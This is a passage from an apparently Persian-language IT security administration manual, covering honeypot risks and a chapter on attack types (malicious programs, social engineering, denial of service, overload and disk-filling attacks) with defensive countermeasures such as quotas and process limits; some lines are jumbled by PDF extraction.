ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ .ﺧﺼﻮﺻﹰﺎ ﺳﻴﺴﺘﻢ ﻃﻌﻤﻪ ﻧﺒﺎﻳﺪ ﻫﻴﭻ ﺍﻃﻼﻋﺎﺗﻲ ﺩﺭ ﻣﻮﺭﺩ ﺳﺎﺯﻣﺎﻥ ﺷﻤﺎ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ .ﺑﺮﺍﻱ ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﺍﻳﻦ ﻣﺴﺎﺋﻞ
ﻣﻲﺗﻮﺍﻥ ﺗﻨﻬﺎ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻧﻮ ﺭﺍ ﺑﻌﻨﻮﺍﻥ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻃﻌﻤﻪ ﺑﻜﺎﺭ ﺑﺮﺩ .ﻫﻤﭽﻨﻴﻦ ﺍﮔﺮ ﺳﺎﺯﻣﺎﻥ ﺑﻪ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﻣﺠﻬﺰ ﺑﺎﺷﺪ ،ﺳﻴﺴﺘﻢ ﻃﻌﻤﻪ ﺑﺎﻳﺪ
ﺧﺎﺭﺝ ﺍﺯ ﺁﻥ ﻗﺮﺍﺭ ﺑﮕﻴﺮﺩ.
ﻣﺨﺎﻃﺮﺓ ﺩﻭﻡ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻃﻌﻤﻪ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﺯ ﺁﻧﻬﺎ ﺑﻌﻨﻮﺍﻥ ﺳﻜﻮﻳﻲ ﺑﺮﺍﻱ ﺣﻤﻠﻪ ﺑﻪ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺩﻳﮕﺮ ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﺍﺳﺘﻔﺎﺩﻩ
ﺷﻮﺩ ،ﻛﻪ ﺩﺭ ﺍﻳﻨﺼﻮﺭﺕ ﺷﻤﺎ ﻣﺴﺌﻮﻟﻴﺖ ﻣﺪﻧﻲ ﺧﺴﺎﺭﺍﺕ ﻭﺍﺭﺩﻩ ﺑﻪ ﺷﺨﺺ ﺛﺎﻟﺚ ﻭ ﻳﺎ ﺣﺘﻲ ﻣﺴﺌﻮﻟﻴﺖ ﺟﺰﺍﺋﻲ ﺗﻮﻃﺌﻪﻫﺎﻱ ﺍﺣﺘﻤﺎﻟﻲ ﺭﺍ ﺑﺮﻋﻬﺪﻩ
ﺧﻮﺍﻫﻴﺪ ﺩﺍﺷﺖ.
ﺑﺪﻟﻴﻞ ﺍﻳﻦ ﻣﺨﺎﻃﺮﺍﺕ ،ﺑﺎﻳﺪ ﭘﻴﺶ ﺍﺯ ﺑﺮﭘﺎﻳﻲ ﻫﺮﮔﻮﻧﻪ ﺳﻴﺴﺘﻢ ﻃﻌﻤﻪ ﻳﺎ ﻛﻮﺯﺓ ﻋﺴﻞ ﺑﺪﻗﺖ ﻓﻜﺮ ﻛﻨﻴﺪ ﻭ ﺗﺮﺟﻴﺤﹰﺎ ﺑﺎ ﻳﻚ ﺣﻘﻮﻗﺪﺍﻥ ﺯﺑﺪﻩ ﻧﻴﺰ
ﻣﺸﻮﺭﺕ ﻧﻤﺎﻳﻴﺪ.
٤٠٩ ﺑﺨﺶ ﭘﻨﺠﻢ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ
ﻓﺼﻞ ﻫﺸﺘﻢ
ﺍﻧﻮﺍﻉ ﺣﻤﻼﺕ ﻭ ﺭﻭﺷﻬﺎﻱ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺁﻧﻬﺎ
ﻛﻠﻴﺎﺕ
ﺑﺮﺍﻱ ﺣﻤﻠﻪ ﺑﻪ ﺍﻳﺴﺘﮕﺎﻫﻬﺎﻱ ﻛﺎﺭﻱ ﻭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎ ﺍﺯ ﻓﻨﻮﻥ ﺑﺴﻴﺎﺭﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺷﺪﻩ ﺍﺳﺖ .ﺍﻳﻦ ﻓﻨﻮﻥ ﺑﻄﻮﺭ ﻛﻠﻲ ﺑﻪ ﺳﻪ ﺩﺳﺘﺔ ﻣﺠﺰﺍ
ﺗﻘﺴﻴﻢ ﻣﻲﺷﻮﻧﺪ:
ﺗﻬﺪﻳﺪﺍﺕ ﺑﺮﻧﺎﻣﻪﺍﻱ
ﺭﺍﻩ ﺩﻳﮕﺮ ﺗﺴﺨﻴﺮ ﻳﻚ ﺳﻴﺴﺘﻢ ﺗﻮﺳﻂ ﻣﻬﺎﺟﻢ ،ﻓﺮﺳﺘﺎﺩﻥ ﻳﻚ ﺑﺮﻧﺎﻣﺔ ﻣﺨﺮﺏ ﺑﻪ ﻛﺎﺭﺑﺮﺍﻥ ﺳﻴﺴﺘﻢ ﻭ ﺍﻧﺘﻈﺎﺭ ﺑﺮﺍﻱ ﺍﺟﺮﺍﻱ ﺍﻳﻦ ﺑﺮﻧﺎﻣـﻪ ﺗﻮﺳـﻂ
ﺁﻧﻬﺎ ﺍﺳﺖ .ﺑﺮﺧﻲ ﺍﺯ ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪﻫﺎ ،ﺳﺮﻭﻳﺴﻬﺎﻱ ﭘﻨﻬﺎﻧﻲ ﻧﺼﺐ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﻛﻨﺘﺮﻝ ﺭﺍﻳﺎﻧﻪ ﺭﺍ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﺑﻪ ﻣﻬﺎﺟﻢ ﻣﻲﺩﻫﺪ؛ ﻭ ﺑﺮﺧـﻲ ﺩﻳﮕـﺮ
ﺗﻜﺜﻴﺮ ﻳﺎﻓﺘﻪ ﻭ ﻣﻴﺎﻥ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺍﻧﺘﻘﺎﻝ ﻣﻲﻳﺎﺑﻨﺪ.
٣٠١
ﻣﻬﻨﺪﺳﻲ ﺍﺟﺘﻤﺎﻋﻲ
ﺩﺭ ﻳﻚ ﺣﻤﻠﺔ ﻣﻬﻨﺪﺳﻲ ﺍﺟﺘﻤﺎﻋﻲ ،ﻣﻬﺎﺟﻢ ﺍﺯ ﺧﺼﻮﺻﻴﺎﺕ ﻃﺒﻴﻌﻲ ﻭ ﺍﺟﺘﻤﺎﻋﻲ ﻛﺎﺭﺑﺮﺍﻥ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺷﻤﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﺪ ﺗﺎ ﺁﻧﻬﺎ
ﺭﺍ ﺑﻪ ﻓﺎﺵ ﻛﺮﺩﻥ ﺍﺳﺮﺍﺭ ﻳﺎ ﺍﻧﺠﺎﻡ ﻛﺎﺭﻫﺎﻱ ﻣﺨﻞ ﺍﻣﻨﻴﺖ ﻭﺍﺩﺍﺭﺩ.
ﺩﺭ ﺍﻳﻦ ﺑﺨﺶ ﻫﺮ ﻳﻚ ﺍﺯ ﺍﻧﻮﺍﻉ ﺍﻳﻦ ﺣﻤﻼﺕ ﺑﻪ ﻫﻤﺮﺍﻩ ﺗﻮﺻﻴﻪﻫﺎﻳﻲ ﺑﺮﺍﻱ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺁﻧﻬﺎ ﺑﻄﻮﺭ ﺟﺪﺍﮔﺎﻧﻪ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ.
ﺑﺨﺶ ﭘﻨﺠﻢ
٣٠٣
ﺣﻤﻼﺕ ﺗﺨﺮﻳﺐ
ﻼ ﺍﺯ ﻛﺎﺭ
ﭼﻨﻴﻦ ﺣﻤﻠﻪﻫﺎﻳﻲ ﺑﻪ ﻣﻨﺎﺑﻊ ﺻﺪﻣﻪ ﻣﻲﺯﻧﻨﺪ ﻳﺎ ﺁﻧﻬﺎ ﺭﺍ ﺗﺨﺮﻳﺐ ﻣﻲﻛﻨﻨﺪ ،ﺑﻄﻮﺭﻳﻜﻪ ﺷﻤﺎ ﺩﻳﮕﺮ ﻧﻤﻲ ﺗﻮﺍﻧﻴﺪ ﺍﺯ ﺁﻧﻬﺎ ﺍﺳﺘﻔﺎﺩﻩﻛﻨﻴﺪ .ﻣﺜ ﹰ
ﺍﻧﺪﺍﺧﺘﻦ ﻳﻚ ﺩﻳﺴﻚ ﻭ ﺩﺭﻧﺘﻴﺠﻪ ﺍﺯ ﻛﺎﺭ ﺍﻓﺘﺎﺩﻥ ﺭﺍﻳﺎﻧﻪ ﻳﺎ ﭘﺎﻙ ﻛﺮﺩﻥ ﻓﺎﻳﻠﻬﺎﻱ ﺣﻴﺎﺗﻲ ﺳﻴﺴﺘﻢ.
ﺭﺍﻫﻬﺎﻱ ﺑﺴﻴﺎﺭﻱ ﺑﺮﺍﻱ ﺍﺯ ﺑﻴﻦ ﺑﺮﺩﻥ ﻭ ﻳﺎ ﺍﻳﺠﺎﺩ ﺍﺧﺘﻼﻝ ﺩﺭ ﺍﻃﻼﻋﺎﺕ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﺗﺨﺮﻳﺐ ﺳﺮﻭﻳﺲ ﻣﻨﺠﺮ ﺷﻮﺩ .ﻣﻲﺗﻮﺍﻥ ﺑﺎ
ﻣﺤﺪﻭﺩ ﻛﺮﺩﻥ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﻓﺎﻳﻠﻬﺎﻱ ﺣﻴﺎﺗﻲ ﻭ ﻣﺤﺎﻓﻈﺖ ﺍﺯ ﺁﻧﻬﺎ ﺩﺭ ﺑﺮﺍﺑﺮ ﻛﺎﺭﺑﺮﺍﻥ ﻏﻴﺮﻣﺠﺎﺯ ،ﺗﻘﺮﻳﺒﹰﺎ ﺍﺯ ﺗﻤﺎﻣﻲ ﺣﻤﻼﺕ ﺷﻨﺎﺧﺘﻪﺷﺪﻩ
ﺟﻠﻮﮔﻴﺮﻱ ﻛﺮﺩ .ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﺳﻴﺴﺘﻢ ﺍﺯ ﺗﺪﺍﺑﻴﺮ ﻣﻨﺎﺳﺐ ﺍﻣﻨﻴﺘﻲ ﺑﻬﺮﻩ ﺑﺒﺮﻳﺪ ،ﺧﻮﺩ ﺑﻪ ﺧﻮﺩ ﺍﺯ ﻭﻗﻮﻉ ﺍﻳﻦ ﻗﺒﻴﻞ ﺣﻤﻼﺕ
ﻣﺨﺮﺏ ﻧﻴﺰ ﺟﻠﻮﮔﻴﺮﻱ ﻛﺮﺩﻩﺍﻳﺪ.
٣٠٤
ﺣﻤﻼﺕ ﺑﺎﺭﮔﺬﺍﺭﻱ ﺑﻴﺶ ﺍﺯ ﺣﺪ
ﺍﻳﻨﮕﻮﻧﻪ ﺣﻤﻼﺕ ،ﺑﺎﺭ ﺑﺴﻴﺎﺭ ﺯﻳﺎﺩﻱ ﺭﻭﻱ ﺑﺮﺧﻲ ﺧﺪﻣﺎﺕ ﺳﻴﺴﺘﻢ ﻣﻲﮔﺬﺍﺭﻧﺪ ﻭ ﻳﺎ ﺗﻤﺎﻡ ﺗﻮﺍﻧﺎﻳﻲ ﺑﺮﺧﻲ ﻣﻨﺎﺑﻊ ﺭﺍ ﻣﺼﺮﻑ ﻣﻲﻛﻨﻨﺪ ،ﻭ ﺩﺭﻧﺘﻴﺠﻪ
ﺟﻠﻮﻱ ﺍﺳﺘﻔﺎﺩﺓ ﺩﻳﮕﺮﺍﻥ ﺍﺯ ﺁﻥ ﺧﺪﻣﺎﺕ ﺭﺍ ﻣﻲﮔﻴﺮﻧﺪ .ﺳﺎﺩﻩﺗﺮﻳﻦ ﻧﻮﻉ ﺑﺎﺭﮔﺬﺍﺭﻱ ،ﭘﺮﻛﺮﺩﻥ ﻳﻚ partitionﺍﺯ ﺩﻳﺴﻚ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﻧﺘﻴﺠﺔ ﺁﻥ
ﻛﺎﺭﺑﺮﺍﻥ ﻭ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺳﻴﺴﺘﻤﻲ ﻧﻤﻲﺗﻮﺍﻧﻨﺪ ﻓﺎﻳﻞ ﺟﺪﻳﺪﻱ ﺍﻳﺠﺎﺩ ﻧﻤﺎﻳﻨﺪ .ﺑﺎﺭﮔﺬﺍﺭﻱ ﺭﻭﻱ ﻳﻚ ﺷﺒﻜﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻤﺒﺎﺭﺍﻥ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ
ﺷﺒﻜﻪ ﺑﺎ ﺩﺭﺧﻮﺍﺳﺘﻬﺎﻱ ﺑﻴﺸﻤﺎﺭ ﺑﺎﺷﺪ ،ﺑﻄﻮﺭﻳﻜﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﻗﺎﺩﺭ ﺑﻪ ﭘﺮﺩﺍﺯﺵ ﺁﻧﻬﺎ ﻧﺒﺎﺷﺪ؛ ﻭ ﻳﺎ ﻣﺸﻐﻮﻝ ﻧﮕﻬﺪﺍﺷﺘﻦ ﺍﺗﺼﺎﻝ ﺍﻳﻨﺘﺮﻧﺘﻲ ﻳﻚ
ﺳﺎﺯﻣﺎﻥ ،ﺑﮕﻮﻧﻪﺍﻱ ﻛﻪ ﭘﻬﻨﺎﻱ ﺑﺎﻧﺪﻱ ﺑﺮﺍﻱ ﻓﺮﺳﺘﺎﺩﻥ ﺍﻃﻼﻋﺎﺕ ﻣﻔﻴﺪ ﺑﺎﻗﻲ ﻧﻤﺎﻧﺪ.
ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻱ ﺟﺪﻳﺪ ،ﺍﺯ ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻳﻲ ﺑﺮﺍﻱ ﺩﻓﺎﻉ ﺩﺭ ﺑﺮﺍﺑﺮ ﺍﻳﻨﮕﻮﻧﻪ ﺣﻤﻼﺕ ﺑﺮﺧﻮﺭﺩﺍﺭﻧﺪ .ﺷﻤﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﻗﺎﺩﺭ ﺑﻪ ﻣﺤﺪﻭﺩ
ﻛﺮﺩﻥ ﺣﺪﺍﻛﺜﺮ ﺗﻌﺪﺍﺩ ﻣﺠﺎﺯ ﭘﺮﺩﺍﺯﻩﻫﺎ ﻭ ﻓﺎﻳﻠﻬﺎﻱ ﻳﻚ ﻛﺎﺭﺑﺮ ،ﻓﻀﺎﻱ ﺩﻳﺴﻚ ﻣﺨﺘﺺ ﻫﺮ ﻛﺎﺭﺑﺮ ،ﻭ ﻳﺎ ﺣﺘﻲ ﻣﻴﺰﺍﻥ ﺯﻣﺎﻥ ﺭﻳﺰﭘﺮﺩﺍﺯﻧﺪﻩ ﻛﻪ ﻫﺮ
ﻛﺎﺭﺑﺮ ﻣﻲﺗﻮﺍﻧﺪ ﻣﺼﺮﻑ ﻛﻨﺪ ﺑﺎﺷﻴﺪ .ﺧﺪﻣﺎﺕ ﺷﺒﻜﻪﺍﻱ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﺟﻬﺖ ﺳﺮﻋﺖ ﻭ ﺯﻣﺎﻥ ﺭﻳﺰﭘﺮﺩﺍﺯﻧﺪﻩ ﻣﺤﺪﻭﺩ ﻛﺮﺩ .ﺑﺎ ﺍﻳﻦ ﻭﺟﻮﺩ ﺑﺴﻴﺎﺭﻱ
ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎ ﻫﻨﻮﺯ ﺩﺭ ﺑﺮﺍﺑﺮ ﺣﻤﻠﻪﻫﺎﻱ ﺗﺨﺮﻳﺐ ﺳﺮﻭﻳﺲ ﺁﺳﻴﺐﭘﺬﻳﺮ ﻫﺴﺘﻨﺪ ،ﭼﺮﺍﻛﻪ ﺗﻨﻈﻴﻤﺎﺕ ﺣﻔﺎﻇﺘﻲ ﻋﻤﻮﻣﹰﺎ ﺍﻧﺠﺎﻡ ﻧﮕﺮﻓﺘﻪ ﻭ ﻳﺎ ﺑﻪ
ﺩﺭﺳﺘﻲ ﺍﻋﻤﺎﻝ ﻧﺸﺪﻩﺍﻧﺪ.
ﺲ ﺑﻪﺍﺷﺘﺮﺍﻙ ﮔﺬﺍﺷﺘﻪﺷﺪﻩ ﺑﺎ ﻱ ﺑﻴﺶ ﺍﺯ ﺣﺪ" )ﻛﻪ ﺩﺭ ﺍﺩﺍﻣﺔ ﺑﺤﺚ ،ﺁﻧﺮﺍ ﺑﻪ ﺍﺧﺘﺼﺎﺭ "ﺣﻤﻼﺕ ﺑﺎﺭﮔﺬﺍﺭﻱ" ﻣﻲﻧﺎﻣﻴﻢ( ،ﻳﻚ ﻣﻨﺒﻊ ﻳﺎ ﺳﺮﻭﻳ ﹺ ﺩﺭ ﺣﻤﻠﺔ "ﺑﺎﺭﮔﺬﺍﺭ ﹺ
ﻲ ﺑﻴﺸﻤﺎﺭﻱ ﻣﺸﻐﻮﻝ ﻣﻲﺷﻮﺩ ،ﺗﺎ ﺟﺎﺋﻴﻜﻪ ﺍﺯ ﭘﺎﺳﺨﮕﻮﻳﻲ ﺑﻪ ﺩﺭﺧﻮﺍﺳﺘﻬﺎﻱ ﺣﻘﻴﻘﻲ ﺳﺎﻳﺮ ﻛﺎﺭﺑﺮﺍﻥ ﺑﺎﺯ ﻣﻲﻣﺎﻧﺪ .ﺑﻌﻨﻮﺍﻥ ﺩﺭﺧﻮﺍﺳﺘﻬﺎﻱ ﻏﻴﺮﺣﻘﻴﻘ ﹺ
ﻣﺜﺎﻝ ﺍﮔﺮ ﻳﻚ ﻛﺎﺭﺑﺮ ﺗﻌﺪﺍﺩ ﺯﻳﺎﺩﻱ ﭘﺮﺩﺍﺯﻩ ﺍﻳﺠﺎﺩ ﻧﻤﺎﻳﺪ ،ﺳﺎﻳﺮ ﻛﺎﺭﺑﺮﺍﻥ ﻗﺎﺩﺭ ﺑﻪ ﺍﺟﺮﺍﻱ ﭘﺮﺩﺍﺯﻩﻫﺎﻱ ﺧﻮﺩ ﻧﺨﻮﺍﻫﻨﺪ ﺑﻮﺩ ،ﻭ ﺍﮔﺮ ﻛﺎﺭﺑﺮﻱ ﺩﻳﺴﻜﻬﺎ
ﺭﺍ ﭘﺮ ﻛﻨﺪ ،ﻛﺎﺭﺑﺮﺍﻥ ﺩﻳﮕﺮ ﻧﻤﻲﺗﻮﺍﻧﻨﺪ ﻓﺎﻳﻞ ﺟﺪﻳﺪﻱ ﺍﻳﺠﺎﺩ ﻛﻨﻨﺪ .ﺷﻤﺎ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﺎ ﺗﻌﺮﻳﻒ ﻭ ﺍﻋﻤﺎﻝ ﻣﺤﺪﻭﺩﻳﺘﻬﺎﻱ ﻣﺨﺘﻠﻒ ﺍﺯ ﺟﻤﻠﻪ
ﻣﺤﺪﻭﺩﻳﺖ ﺩﺭ ﺣﺠﻢ ﻣﺠﺎﺯ ﺩﻳﺴﻚ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﺓ ﻛﺎﺭﺑﺮﺍﻥ ) ،(quotaﺗﺎ ﺣﺪﻭﺩﻱ ﺍﺯ ﻣﻨﺎﺑﻊ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﺓ ﻛﺎﺭﺑﺮﺍﻥ ﺩﺭ ﻣﻘﺎﺑﻞ ﺣﻤﻼﺕ
ﺑﺎﺭﮔﺬﺍﺭﻱ ﻣﺤﺎﻓﻈﺖ ﻧﻤﺎﻳﻴﺪ .ﺷﻤﺎ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﻣﺤﺪﻭﺩﻳﺘﻬﺎﻱ ﻓﻴﺰﻳﻜﻲ ﺑﻌﻨﻮﺍﻥ ﻧﻮﻋﻲ quotaﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ؛ ﻣﺜ ﹰ
ﻼ ﻣﻨﺎﺑﻊ ﺭﺍﻳﺎﻧﺔ ﺧﻮﺩ ﺭﺍ ﺑﻪ
partitionﻫﺎﻱ ﻣﺨﺘﻠﻒ ﺗﻘﺴﻴﻢ ﻧﻤﺎﻳﻴﺪ ﻭ ﻫﺮ ﻛﺎﺭﺑﺮ ﺭﺍ ﻣﺤﺪﻭﺩ ﺑﻪ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ partitionﮔﺮﺩﺍﻧﻴﺪ .ﻧﻬﺎﻳﺘﹰﺎ ﺍﻳﻨﮑﻪ ﺷﻤﺎ ﻣﻲﺗﻮﺍﻧﻴﺪ
ﺳﻴﺴﺘﻤﻬﺎ ﺭﺍ ﻃﻮﺭﻱ ﺗﻨﻈﻴﻢ ﻛﻨﻴﺪ ﻛﻪ ﺑﺎﺭﮔﺬﺍﺭﻱ ﺑﻴﺶ ﺍﺯ ﺣﺪ ﺭﺍ ﺑﻄﻮﺭ ﺧﻮﺩﻛﺎﺭ ﺗﺸﺨﻴﺺ ﺩﻫﻨﺪ ﻭ ﺩﺭ ﺁﻧﺼﻮﺭﺕ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺭﺍ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﻣﺠﺪﺩ
ﻛﻨﻨﺪ) .ﻫﺮﭼﻨﺪ ﺑﻪ ﺍﻳﻦ ﺗﺮﺗﻴﺐ ﺑﻪ ﻣﻬﺎﺟﻢ ﺍﻣﻜﺎﻥ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﻣﺠﺪﺩ ﺭﺍﻳﺎﻧﻪ ﺭﺍ ﺩﺍﺩﻩﺍﻳﺪ ﻛﻪ ﺍﻳﻦ ﺧﻮﺩ ﻣﻲﺗﻮﺍﻧﺪ ﻣﺸﻜﻼﺕ ﺩﻳﮕﺮﻱ ﺑﻮﺟﻮﺩ ﺁﻭﺭﺩ(.
"ﺧﺮﮔﻮﺵ" ﮔﻔﺘﻪ ﻣﻲﺷﻮﺩ؛ ﭼﻮﻥ ﺗﻮﻟﻴﺪ ﻣﺜﻞ ﺁﻧﻬﺎ ﺳﺮﻋﺖ ﺑﺴﻴﺎﺭ ﺑﺎﻻﻳﻲ ﺩﺍﺭﺩ .ﺑﻄﻮﺭ ﻛﻠﻲ ﺍﻳﻦ ﺣﻤﻼﺕ ﺩﺭ ﻣﻮﺭﺩ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺑﻪﺍﺷﺘﺮﺍﻙ
ﮔﺬﺍﺷﺘﻪﺷﺪﻩ ﻣﻮﺿﻮﻋﻴﺖ ﭘﻴﺪﺍ ﻣﻲﻛﻨﻨﺪ ،ﭼﺮﺍﻛﻪ ﺍﮔﺮ ﻛﺎﺭﺑﺮﻱ ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ﺧﻮﺩﺵ ﺭﺍ ﺑﻴﺶ ﺍﺯ ﻇﺮﻓﻴﺖ ﺑﺎﺭﮔﺬﺍﺭﻱ ﻛﻨﺪ ،ﺗﺎ ﻭﻗﺘﻲ ﻗﺮﺍﺭ ﻧﻴﺴﺖ
٣٠٦
ﺷﺨﺺ ﺩﻳﮕﺮﻱ ﺍﺯ ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ ﭼﻨﺪﺍﻥ ﻣﻬﻢ ﻧﻴﺴﺖ.
ﺑﻬﺘﺮﻳﻦ ﺭﺍﻩ ﻣﺒﺎﺭﺯﻩ ﺑﺎ ﻣﺸﻜﻼﺕ ﺑﺎﺭﮔﺬﺍﺭﻱ ،ﺁﻣﻮﺯﺵ ﻛﺎﺭﺑﺮﺍﻥ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﻋﺎﺩﻻﻧﺔ ﺑﻪﺍﺷﺘﺮﺍﻙﮔﺬﺍﺭﻱ ﻣﻨﺎﺑﻊ ﻣﻲﺑﺎﺷﺪ .ﺍﮔﺮ
ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺷﻤﺎ ﻧﻴﺎﺯﻣﻨﺪ ﭘﺮﺩﺍﺯﺵ ﺑﺎﻻ ﻫﺴﺘﻨﺪ ﻭ ﺷﻤﺎ ﻫﻢ ﺷﺒﻜﻪﺍﻱ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻣﺸﺎﺑﻪ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺩﺍﺭﻳﺪ ،ﺑﻬﺘﺮ ﺍﺳﺖ ﺍﺯ ﻳﻚ ﺳﻴﺴﺘﻢ
ﺗﻮﺯﻳﻊﺷﺪﺓ ﺯﻣﺎﻧﺒﻨﺪﻱ ﻭﻇﺎﻳﻒ ٣٠٧ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ .ﻣﺤﺪﻭﺩﻳﺘﻬﺎ ﻭ quotaﻫﺎ ﻧﻴﺰ ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﺁﻧﻬﺎ ﺭﺍ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻛﻨﺪ ﻣﻲﺗﻮﺍﻧﻨﺪ
ﻣﻔﻴﺪ ﺑﺎﺷﻨﺪ.
ﺣﻤﻼﺕ ﺑﻪ ﺩﻳﺴﻜﻬﺎ
ﻳﻚ ﺭﺍﻩ ﺩﻳﮕﺮ ﺑﺮﺍﻱ ﻏﻠﺒﻪ ﺑﺮ ﻳﻚ ﺳﻴﺴﺘﻢ ،ﭘﺮ ﻛﺮﺩﻥ ﺑﺨﺸﻬﺎﻱ ﻣﺨﺘﻠﻒ ﺩﻳﺴﻚ ﻣﻲﺑﺎﺷﺪ .ﺍﮔﺮ ﻳﻚ ﻛﺎﺭﺑﺮ ﺗﻤﺎﻡ ﺩﻳﺴﻚ ﺭﺍ ﭘﺮ ﻛﻨﺪ ،ﺍﺯ ﺁﻥ
ﭘﺲ ﺳﺎﻳﺮ ﻛﺎﺭﺑﺮﺍﻥ ﻗﺎﺩﺭ ﺑﻪ ﺍﻳﺠﺎﺩ ﻓﺎﻳﻠﻬﺎﻱ ﺟﺪﻳﺪ ﻭ ﺑﻌﺒﺎﺭﺗﻲ ﺍﻧﺠﺎﻡ ﻛﺎﺭ ﻣﻔﻴﺪ ﻧﺨﻮﺍﻫﻨﺪ ﺑﻮﺩ .ﺑﻌﻀﻲ ﺍﻭﻗﺎﺕ ﺯﻣﺎﻧﻴﻜﻪ ﻳﻚ ﺑﺮﻧﺎﻣﻪ ﻳﺎ ﻛﺎﺭﺑﺮ ﺑﻪ
ﺍﺷﺘﺒﺎﻩ ﺍﻗﺪﺍﻡ ﺑﻪ ﺍﻳﺠﺎﺩ ﻓﺎﻳﻠﻬﺎﻱ ﻣﺘﻌﺪﺩ ﻣﻲﻛﻨﺪ ،ﻇﺮﻓﻴﺖ ﺩﻳﺴﻚ ﺑﻄﻮﺭ ﻧﺎﮔﻬﺎﻧﻲ ﭘﺮ ﻣﻲﮔﺮﺩﺩ .ﺩﺭ ﻣﻮﺍﻗﻊ ﺩﻳﮕﺮ ﺑﺎ ﺯﻳﺎﺩ ﺷﺪﻥ ﺗﺪﺭﻳﺠﻲ ﻓﻀﺎﻱ
ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺎﺭﺑﺮﺍﻥ ،ﺩﻳﺴﻜﻬﺎ ﺑﻪ ﻣﺮﻭﺭ ﭘﺮ ﻣﻲﺷﻮﻧﺪ.
ﺍﻛﺜﺮ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎ ﺩﺳﺘﻮﺭﺍﺗﻲ ﺩﺍﺭﻧﺪ ﻛﻪ ﺑﻪ ﻣﺪﻳﺮﺍﻥ ﺩﺭ ﻛﻨﺘﺮﻝ ﻓﻀﺎﻱ ﺩﻳﺴﻚ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﺗﻮﺳﻂ ﻛﺎﺭﺑﺮﺍﻥ ﻭ ﺩﺭ ﺍﺗﺨﺎﺫ ﺗﺼﻤﻴﻢ ﺩﺭ ﻣﻮﺭﺩ
ﭘﺎﻙ ﻛﺮﺩﻥ ﻓﺎﻳﻠﻬﺎ ﺟﻬﺖ ﺍﻳﺠﺎﺩ ﻓﻀﺎﻱ ﺑﻴﺸﺘﺮ ﻛﻤﻚ ﻣﻲﻛﻨﻨﺪ .ﻳﻚ ﺭﺍﻩ ﻣﺆﺛﺮ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺳﻴﺴﺘﻢ ﺩﺭ ﻣﻘﺎﺑﻞ ﺣﻤﻼﺕ ﺩﻳﺴﻜﻲ ،ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ
